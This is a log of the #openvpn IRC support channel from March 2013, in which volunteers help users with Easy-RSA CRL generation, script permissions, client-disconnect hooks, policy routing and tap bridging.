14:57 < TheWarden> so easy-rsa or openssl
14:57 < pekster> !factoids whatis log
14:57 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging
14:57 -!- master_o1_master [~master_of@p4FF24CAD.dip.t-dialin.net] has joined #openvpn
14:58 < pekster> TheWarden: Right. Easy-RSA is just a frontend to openssl. openssl is a non-trivial tool to use for the uninitiated, and even to those of us who know some of it's oddities, openssl gives awful error messages
14:58 < pekster> its*
14:58 < TheWarden> mmm
14:59 < pekster> Easy-RSA 2.x has some usability issues too (like the lack of crl update without revoke you pointed out.) We're working to change that, but current code is tested to the extent I've been able to in the last few days, much of it between 11PM and 2AM last night. You're free to send me bug reports and errors though ;)
14:59 < pekster> Otherwise, just try "revoke-full" without parameters and see what happens
14:59 < pekster> I think you'll get a "keys/crl.pem" file
15:00 < TheWarden> pekster: I tried that and I get usage: revoke-full
15:00 < pekster> Oh. Right. Feed it something bogus
15:00 < pekster> Not a real cert or it'll revoke it
15:00 < TheWarden> really... ok
15:01 < pekster> ecrist: Yup. it was clearly high time for a replacement. While my prototype code is minimally tested/debugged, it does this right :P
15:01 -!- master_of_master [~master_of@p4FF2446B.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
15:01 < TheWarden> ./revoke-full foo
15:01 < TheWarden> Please source the vars script first (i.e. "source ./vars")
15:01 < TheWarden> Make sure you have edited it to reflect your configuration.
15:01 < pekster> Right, you need vars sourced in any terminal you wish to use Easy-RSA from
15:02 < pekster> If you're coming back to an existing PKI you've set up before with Easy-RSA, just do "source ./vars" before you use commands
15:03 < TheWarden> pekster: ahh what if you ran ./vars already?
15:03 < TheWarden> as I'm doing this for an existing PKI
15:03 < pekster> It just exports env-vars. It's safe to call that as many times as you'd like
15:03 < pekster> But it is an error to use Easy-RSA commands without sourcing it at least once ;)
15:04 < TheWarden> okay so I did source ./vars then now revoke-all
15:04 < pekster> Yea, it'll spit at least one error if "foo.crt" doesn't exist, but it should generate the CRL afterwards fine
15:05 < pekster> Then it'll spit some more crap as it tries to verify a non-existent cert :P
15:05 < TheWarden> yes it did but it created crl.pem for me.
15:05 < pekster> There ya go
15:05 < TheWarden> so now I'll copy that to /etc/openvpn
15:05 < pekster> I promise this will get easier when we get the new hotness put into the official releases
15:07 < pekster> In the future, you'll never need to update that crl unless you have a cert you need to revoke before it expires (eg: compromised access, user no longer allowed in, etc.) With --verify-crl on the server, it'll become live the moment you replace the CRL file, although only checked for new connections or TLS re-keys
15:07 < pekster> It is a good idea to do what you're doing, since otherwise adding a --verify-crl to the config requires a server restart (may not be desirable if other people are using it)
15:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:13 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
15:22 -!- Harty [~Hart@AAubervilliers-151-1-49-31.w83-114.abo.wanadoo.fr] has joined #openvpn
15:26 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wkuxkpkoldxkvqtz] has joined #openvpn
15:29 -!- paccer [uid4847@gateway/web/irccloud.com/x-hpjsylhuzdlmuipv] has joined #openvpn
15:34 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
15:38 < TheWarden> what does this mean? Options error: --auth-user-pass-verify script fails with '/etc/openvpn/scripts/auth_kerberos.sh': Permission denied
15:38 < TheWarden> I verified that the script is present
15:39 < pekster> Permissions issue calling the script, or possibly from the script itself. Likely an issue with downgraded user privs
15:40 < TheWarden> pekster: this is what I have, -rw-r--r-- 1 root root 1777 Mar 13 14:20 auth_kerberos.sh
15:41 < pekster> You cannot execute things that are not executable
15:41 < TheWarden> oh man I can't believe I didn't see tat
15:41 < TheWarden> that
15:41 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving]
15:41 <@EugeneKay> Don't tell me what I can't do
15:41 <@EugeneKay> You're not my real mom!
15:41 < pekster> EugeneKay can apparently do that. He can probably also fly if he jumps off a bridge ;)
15:42 <@EugeneKay> I am at an airport
15:42 < pekster> s/bridge/control tower/
15:44 <@EugeneKay> I think I shall fold up the laptop and go back to the bar
15:45 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]]
15:50 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 276 seconds]
15:51 -!- mustu [~maan@119.63.130.93] has joined #openvpn
15:52 -!- mustu is now known as Guest69565
16:01 < dzubey> okay, i guess I need to ask for help.
16:01 <+[oc80z]> hehe att'a b.
16:02 < dzubey> I got a script that's called by --learn-address, and the script adds and removes host names from dns. works great...
16:02 < dzubey> ..except --learn-address doesn't set the common_name of the connecting client when it's deleting.
16:03 < dzubey> soo...any way I can get the server to tell the script that it's deleting a client, and what the common name that's getting deleted is?
16:03 < dzubey> ..please?
16:04 <+[oc80z]> what string is common_name? from certificates?
16:04 < dzubey> yea.
16:04 <+[oc80z]> from the client's identifiable 'common_name'
16:05 <+[oc80z]> --learn-address cmd : Run script cmd to validate client virtual addresses.
16:05 -!- brute11k [~brute@89.249.235.131] has quit [Quit: Leaving.]
16:05 <+[oc80z]> here is from 2004: http://openvpn.net/archive/openvpn-users/2004-06/msg00338.html
16:05 <@vpnHelper> Title: [Openvpn-users] --learn-address cmd ?? (at openvpn.net)
16:05 < dzubey> right. I'm using that successfully for adds and updates.
16:06 <+[oc80z]> [3] common name -- The common name on the certificate associated with the client linked to this address. Only present for "add" or "update" operations, not "delete".
16:06 < dzubey> yep. delete doesn't include the common_name. Hence my problem :)
16:07 <+[oc80z]> does the delete work?
16:07 <+[oc80z]> could you just match the delete with the previous common_name?
16:07 < dzubey> The script gets called for delete, yes.
16:08 -!- mezgani [~mezgani@41.140.2.243] has joined #openvpn
16:09 < dzubey> I've tried several things..i've parsed the status file for the client's info. That doesn't work if the client is on another server, where that server is connected as a client.
16:10 < dzubey> I've stopped myself from creating a mysql database to record the addresses/hostnames for the script, since DNS is a database that's supposed to record that anyways
16:10 <+[oc80z]> did you read the next thread answer
16:10 <+[oc80z]> James replied: http://openvpn.net/archive/openvpn-users/2004-06/msg00365.html
16:10 < dzubey> just a sec
16:10 <@vpnHelper> Title: Re: [Openvpn-users] --learn-address cmd ?? (at openvpn.net)
16:11 -!- p3rror [~mezgani@41.249.96.133] has quit [Ping timeout: 258 seconds]
16:12 < dzubey> ..reading...permissions isn't a problem..
16:12 < dzubey> ..still reading
16:12 * [oc80z] reading other stuff, I've not used this in a while+
16:13 <+[oc80z]> this, re: events on client conn/dconn
16:15 < dzubey> maybe --down?
16:15 <+[oc80z]> that might be server only?
16:15 < dzubey> yea, this is all on the server.
16:15 < dzubey> so it's ok
16:15 <+[oc80z]> er... server-side only, when the server goes --down
16:16 < dzubey> oh..hmm
16:16 <+[oc80z]> double check, like I said, I'm not sure, it might be for that..
16:17 < dzubey> no, that's the only time the tun/tap device closes, so you're right
16:17 <+[oc80z]> how is --learn-address 'called multiple times...'
16:18 < dzubey> from what i've observed, it's any time the learning mechanism in the server gets triggered.
16:18 <+[oc80z]> sure, yeah... i think the wording is misleading.
16:19 <+[oc80z]> can you change delete to update, and then change the ip to 0.0.0.0, and then capture the common_name?
16:20 < dzubey> you mean on the dns side?
16:20 <+[oc80z]> yeah, i guess... i mean.. if a client disconnects, does update ever trigger?
16:20 < dzubey> the script has to react to a delete from the server, the dns name has to go away when the client does.
16:21 < dzubey> oh i see what you mean
16:21 <+[oc80z]> yea, otherwise it's stale/ghost
16:21 <+[oc80z]> or duplicate
16:21 < dzubey> no, it doesn't. I only get one call.
16:21 < TheWarden> I'm running wbinfo --group-info VPN to get a list of the users in the VPN group and all I get is this returned, VPN:*:3000025:
16:21 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
16:21 < TheWarden> there are no users listed at the end
16:24 < dzubey> well i'm stumped
16:24 < TheWarden> I don't get it, what would cause it not to return the list of users for that group?
16:25 < TheWarden> I even tried to do this, /usr/local/samba/bin/wbinfo --group-info="Domain Admins" and it only returns Domain Admins:*:3000008:
16:26 < TheWarden> I know there are users within these groups Domain Admins and VPN.
16:26 <+[oc80z]> dzubey maybe the code does not touch any certificates
16:26 < TheWarden> Oops sorry wrong channel lol
16:26 <+[oc80z]> so there's nowhere for that disconnect function to point you to for that certificate info
16:27 <+[oc80z]> whereas, update and add, those certs are definitely passed in as a string for that event
16:27 <+[oc80z]> it's confusing when you said the server as a client.
16:27 < dzubey> yea, there's probably a reason.
16:28 < pekster> Why not hook into --client-disconnect?
16:28 < dzubey> yea, i've got two linux machines, each with an openvpn server on it, and they're linked via a client connection.
16:28 < pekster> I missed some of the backlog there, but your goal is to run something when the client disconnects based on CN, right?
16:28 < dzubey> yea, delete a dns host
16:28 <+[oc80z]> [3] common name -- The common name on the certificate associated with the client linked to this address. Only present for "add" or "update" operations, not "delete".
16:28 < dzubey> i'm looking up --client-connect
16:29 < dzubey> ..disconnect.
16:29 <+[oc80z]> ok
16:29 < pekster> --client-disconnect /usr/local/sbin/dns_host_delete.sh
16:29 < pekster> or w/e
16:29 <+[oc80z]> TheWarden :P
16:29 < dzubey> that might do it..let me try
16:30 < pekster> --client-connect is probably a better spot to be hooking into the client connect anyway for that kind of stuff, not --learn-address. You get much more control over env-vars that way (not that you need them in your setup on connect, I guess)
16:30 < dzubey> the script is pretty flexible, so i can call it from anywhere
16:31 < pekster> Right, but --client-{connect,disconnect} use the conventional $common_name env-var
16:31 < pekster> No worrying about the argument being present during add/update but not delete tasks
16:32 < dzubey> ok
16:32 < pekster> I've got a sample of user accounting on disconnect here, showing potential use:
16:32 < pekster> !accounting
16:32 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting
16:32 -!- Guest69565 [~maan@119.63.130.93] has quit [Ping timeout: 245 seconds]
16:33 < dzubey> yea, similar to what i have
16:33 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
16:34 < dzubey> thx. I'm going to restart the server and terrify about 20 people right now. Just a sec.
16:34 < pekster> Well, if it comes back up afterwards... :)
16:35 < pekster> Terrorizing them would be leaving it off, I'd think.
16:35 < dzubey> you don't understand..these guys get one packet delayed, there's screaming.
16:35 < dzubey> heh
16:38 <+[oc80z]> tell them to reset their windows firewall to defaults.
16:38 <+[oc80z]> no, heh..
16:38 <+[oc80z]> that would be criminal.
16:39 < hazardous> hi [oc80z]
16:39 < hazardous> is that a drug reference :o
16:39 <+[oc80z]> no
16:40 <+[oc80z]> ye
16:40 <+[oc80z]> i plead the 5th
16:41 < Harty> Hi, is it possible to use OpenVPN only for some ports or software?
16:42 < hazardous> you can use it for some ips?
16:42 < pekster> Harty: At an OS level that would require setting up policy routing
16:44 < Harty> hum ok thx
16:44 < pekster> Optionally if your application is SOCKS-aware, just define a proxy in its application settings and set up a proxy at the other end of the tunnel. I do this with my browser and a VPN at my cloud VM when I need external access
16:45 < Harty> i can define proxy on my soft, but actually i'm using a Free OpenVPN server for test
16:45 < hazardous> pekster: any chance you can recommend some way i can force non proxy aware applications through a proxy?
16:46 < dzubey> transparent proxy via squid?
16:47 < Harty> i can't control the openvpn server, and that's why i'm trying to use some table in the VPNConf
16:48 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn []
16:48 < pekster> Harty: you can do policy routing, but you need routing tables and rules to sort your traffic
16:49 < Harty> actually, i'm looking in the Windows Firewall config, and i can choose the interfaces for my protocol or port
16:49 < pekster> A Windows client won't do what you want, not unless you're running IAS server or something
16:50 < pekster> You need to take routing action based on definable connection characteristics
16:51 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:53 <+[oc80z]> yeah
16:54 < Harty> ok so i think i will use a VM for my VPN :|
16:54 < pekster> For an OS that'll cost you $0, it'll so much more
16:54 < pekster> do*
16:55 < Harty> ?
16:55 < pekster> Oh, unless you mean a Windows VM :(
16:55 < Harty> any OS
16:55 < rob0> Policy routing might be possible on Windows, but no one outside of Redmond will know how to do it.
16:55 < Harty> will try on a MAC ;)
16:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
17:02 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
17:03 < dzubey> I just got an SMS
17:03 < dzubey> "SHIT AINT WORKING"
17:03 < dzubey> *sigh*
17:04 <@ecrist> heh
17:07 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
17:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
17:11 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:13 < Harty> pekster what's the difference between policy routing and the Windows hosts file?
17:16 <+[oc80z]> dzubey hahaahah
17:18 < pekster> Harty: many things. hosts is a way to short-circuit getHostByName() calls that would have gone to DNS, while policy routing is a framework for making routing decisions
17:18 < pekster> !101
17:18 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
17:23 < Harty> but can i use policy routing to force a port on a network interface? if not this is no help for me, and google isn't helping much
17:28 <+[oc80z]> what
17:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
17:51 -!- Harty [~Hart@AAubervilliers-151-1-49-31.w83-114.abo.wanadoo.fr] has quit [Quit: Quitte]
17:58 < TheWarden> to use openvpn-plugin-auth-pam, doesn't one just add to server.conf plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so login and then auth-user-pass-verify somescript?
18:00 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
18:01 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
18:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds]
18:07 * TheWarden sighs
18:21 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
18:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
18:34 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds]
18:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:45 < TheWarden> good night everyone
18:45 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]]
18:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 258 seconds]
18:57 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Quit: No Ping reply in 180 seconds.]
18:58 -!- joako [~joako@opensuse/member/joak0] has joined #openvpn
18:58 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn
18:58 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
19:02 -!- mezgani [~mezgani@41.140.2.243] has left #openvpn ["Leaving"]
19:15 -!- mustu [~maan@221.120.210.138] has joined #openvpn
19:16 -!- mustu is now known as Guest9264
19:16 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
19:18 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:20 -!- Guest9264 [~maan@221.120.210.138] has quit [Ping timeout: 260 seconds]
19:20 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
19:23 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
19:24 -!- ngharo_ is now known as ngharo
19:25 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
19:27 -!- JSharpe [~JSharpe@ip5-63-144-28.lon.ukinetcom.net] has quit [Quit: Leaving]
19:27 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds]
19:32 -!- mustu__ [~maan@221.120.210.138] has joined #openvpn
19:35 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
19:37 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
19:38 -!- mustu__ [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds]
19:45 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
19:50 -!- mustu__ [~maan@221.120.210.138] has joined #openvpn
19:50 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds]
19:51 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
19:52 -!- master_of_master [~master_of@p4FF24BF0.dip.t-dialin.net] has joined #openvpn
19:53 -!- mustu__ [~maan@221.120.210.138] has quit [Read error: Connection reset by peer]
19:55 -!- mustu_ [~maan@221.120.210.138] has joined #openvpn
19:56 -!- master_o1_master [~master_of@p4FF24CAD.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
20:00 -!- raidz is now known as raidz_away
20:01 -!- mustu__ [~maan@119.63.130.93] has joined #openvpn
20:01 -!- mustu_ [~maan@221.120.210.138] has quit [Read error: Connection reset by peer]
20:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
20:05 -!- mustu__ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
20:06 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
20:06 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
20:08 -!- mustu_ [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
20:09 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds]
20:11 -!- mustu [~maan@119.63.130.93] has joined #openvpn
20:11 -!- mustu is now known as Guest52585
20:16 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
20:30 -!- mustu_ [~maan@221.120.210.138] has joined #openvpn
20:30 -!- Guest52585 [~maan@119.63.130.93] has quit [Read error: Connection reset by peer]
20:34 -!- mustu_ [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds]
20:35 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
20:37 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 272 seconds]
20:40 -!- mustu__ [~maan@119.63.130.93] has joined #openvpn
20:41 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 245 seconds]
20:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
20:45 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
20:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
20:47 -!- master_o1_master [~master_of@p4FF244AC.dip.t-dialin.net] has joined #openvpn
20:50 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
20:50 -!- master_of_master [~master_of@p4FF24BF0.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
20:56 -!- dzubey [~dzubey@68.14.254.195] has left #openvpn ["PING 1363226174"]
21:47 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
22:09 -!- ironmagma [~ironmagma@66-231-148-248.apt.gru.net] has joined #openvpn
22:13 < ironmagma> Hi there, I'm following the tutorial at https://help.ubuntu.com/community/OpenVPN and got to "Generating Client Certificate and Key", but when I run the third line I run into an error..
22:13 <@vpnHelper> Title: OpenVPN - Community Ubuntu Documentation (at help.ubuntu.com)
22:14 < ironmagma> http://codepad.org/cSHjIjey is the terminal output. I'm not sure of the meaning of everything I configured
22:14 <@vpnHelper> Title: Plain Text code - 22 lines - codepad (at codepad.org)
22:15 < ironmagma> i.e. what KEY_OU should have. assuming that probably isn't the cause for the error but figured it might be worth mentioning
22:16 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
22:19 < ironmagma> anyone know what causes the error or how to fix it?
22:37 < joako> ironmagma, Try to change the commonName to something else
22:46 < ironmagma> Thanks, that seemed to work. What should common name contain exactly?
22:47 < joako> Normally you put the fqdn but for OpenVPN it doesn't really matter
23:00 -!- sanfran [~sanfran@185.3.135.34] has joined #openvpn
23:00 < sanfran> !welcome
23:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
23:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
23:11 -!- sanfran [~sanfran@185.3.135.34] has quit [Quit: leaving]
23:15 < hazardous> i don't think i've encountered a non-tourist yet that called it san fran
23:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
--- Day changed Thu Mar 14 2013
00:04 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 258 seconds]
00:15 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
00:15 -!- ironmagma [~ironmagma@66-231-148-248.apt.gru.net] has quit [Ping timeout: 240 seconds]
00:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
00:38 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds]
00:42 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn
00:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
00:44 < stan_man_can> Are there any really simple openvpn guides available for setting up a server on linux? I just want something to run on my VPS so I can view US sites
00:45 < pekster> !howto
00:45 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
00:46 < pekster> Start with the official howto, then once you have basic connectivity up, either redirect all your traffic across the VPN, or use a proxy across the VPN tunnel and point your browser to the proxy
00:46 < pekster> For redirecting traffic, first get a working VPN tunnel, then follow this:
00:46 < pekster> !redirect
00:46 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
00:46 <@vpnHelper> http://ircpimps.org/redirect.png
00:48 < stan_man_can> Is it a pain to set up? My server admin skills leave much to be desired, I was hoping somewhere, someone would have put together a walkthrough
00:50 < stan_man_can> pekster: is openvpn access server a more brain dead approach?
00:50 < pekster> The howto is effectively a walkthrough to basic VPN connectivity
00:52 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
00:53 < pekster> I can't speak to Access Server; that's the commercial side, and I strictly deal with the GPL open-source software. If you wish to use a non-open commercial product, you're of course free to look into it
00:53 < stan_man_can> fair enough
00:54 < stan_man_can> I remember setting up openvpn a few years back and getting it to work, but now it's getting the best of me
01:09 -!- ade_b [~Ade@koln-5d8146d4.pool.mediaWays.net] has joined #openvpn
01:09 -!- ade_b [~Ade@koln-5d8146d4.pool.mediaWays.net] has quit [Changing host]
01:09 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
01:15 -!- Nemus [~Nemus@unaffiliated/nemus] has joined #openvpn
01:16 < Nemus> so I have a connection set up to do bridging, it connects successfully but I cannot connect to the remote network
01:18 < pekster> Nemus: first off, why are you bridging? Normally you want to use a routed/tun setup unless you need tap specifically (see output from the bot momentarily.) Regardless, configs/logs would help
01:18 < pekster> !tunortap
01:18 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
01:18 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
01:19 < Nemus> I have set up several successful routed versions of openvpn but wanted to learn how to set up a bridge vpn to use for lan gaming
01:19 < pekster> Ah, sure
01:20 < pekster> tap isn't wrong, but sadly many people use it mistakenly thinking it's "easier." Are you trying to bridge to a physical network, or just have a completely virtual tap-based LAN?
01:20 < Nemus> I am trying to connect to a physical network from a remote computer.
01:21 < Nemus> http://pastebin.com/5LU8xmcS
01:22 < Nemus> is my bridge setup on the physical server connected to the physical lan
01:24 -!- Teck7__ [~teck7@bas1-montreal54-1279375478.dsl.bell.ca] has joined #openvpn
01:24 < Nemus> http://pastebin.com/af9Drk0D
01:24 < Nemus> more info
01:25 < pekster> Can you paste the server config (comments stripped please) and interface info via 'ip addr' ?
01:25 < Nemus> yep
01:26 -!- Teck7 [~teck7@76.65.61.190] has quit [Ping timeout: 245 seconds]
01:28 < pekster> There's some useful sed magic to strip comments:
01:28 < pekster> !configs
01:28 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
01:31 < Nemus> oh thank you
01:32 < stan_man_can> !def1
01:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
01:33 < Nemus> http://pastebin.com/zDMVZNg6
01:34 < Nemus> that should have everything
01:34 < pekster> Yea. This works, but in the future:
01:34 < pekster> !ifconfig-linux
01:34 <@vpnHelper> "ifconfig-linux" is Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. Use the 'ip a' and 'ip r' commands instead. More info: http://inai.de/2008/0219-ifconfig-sucks.php
01:35 < pekster> So, tap0 is not in the br0 bridge
01:35 < Nemus> http://pastebin.com/vxLk3nGK
01:35 < Nemus> sorry brctl show was missing tap0 in the bridge on the pastebin
01:36 < Nemus> it just got cut off in the paste
01:37 < Nemus> it's been boggling my mind
01:37 < pekster> Then it looks okay. Can you ping 10.1.10.2 after you connect?
01:37 < Nemus> I even have selinux off
01:37 < Nemus> nope
01:37 < stan_man_can> !pushdns
01:37 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also
01:37 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7
01:40 < pekster> Logs would be the next step. Generally anything above verb 5 is for debug purposes, and at verb 5 you get rRwW printed in the logs for tunneled/encapsulated packets read/write
01:40 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has quit [Quit: stan_man_can]
01:40 < pekster> !logs
01:40 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
01:40 < Nemus> http://pastebin.com/bqkgiJsX attached is all i see from openvpn
01:41 < pekster> That's missing all the interesting bits about the connect. Drop to 'verb 4' and you'll get more sane looking logs from the connection
01:47 < Nemus> http://pastebin.com/VsXzcAyB
01:48 < Nemus> I think something is blocking it
01:50 < pekster> And the client logs?
01:51 < pekster> The connect sequence looks fine from the server's view
01:51 < Nemus> do you want the client config also?
01:52 < pekster> Depends on what I see in the log :P
01:59 < Nemus> http://pastebin.com/rPFui3xm
02:01 < Nemus> http://pastebin.com/qPZ9cUK6
02:01 < Nemus> with client config
02:02 < pekster> Odd indeed. Next step would be to tcpdump packets and see why you don't get a ping reply from 10.1.10.2 from 10.1.10.200
02:02 < Nemus> would it be anything if sysctl?
02:03 < Nemus> with*
02:05 < pekster> Shouldn't be, unless you've gone messing with some obscure settings (things like misconfiguring arp_ignore would be Bad, but you have to try to break something like that)
02:05 < Nemus> well I am off to bed thank you so much for your help
02:05 < Nemus> still not quite sure why it isn't working
02:05 < pekster> Yea. I'd see where you lose the ping
02:06 < Nemus> on tcpdump i see the arp request at the host
02:06 < Nemus> but not at the server
02:06 < Nemus> I see the openvpn packets come in
02:06 < Nemus> but after that it's nothing
02:06 < Nemus> very odd
02:06 < pekster> So you see the udp port 969 stuff, but not the encapsulated ARP request on br0?
02:07 < Nemus> yep
02:08 < pekster> Oh, I just noticed in your log from earlier it said device tap1 opened
02:08 < pekster> Not ta0
02:08 < pekster> tap0*
02:09 < pekster> If you've created tap0 outside openvpn, you need to explicitly tell it to use that device
02:09 < pekster> Otherwise, if you'd like to let openvpn dynamically create one for you, you'll need a script to add it to your bridge when it comes up
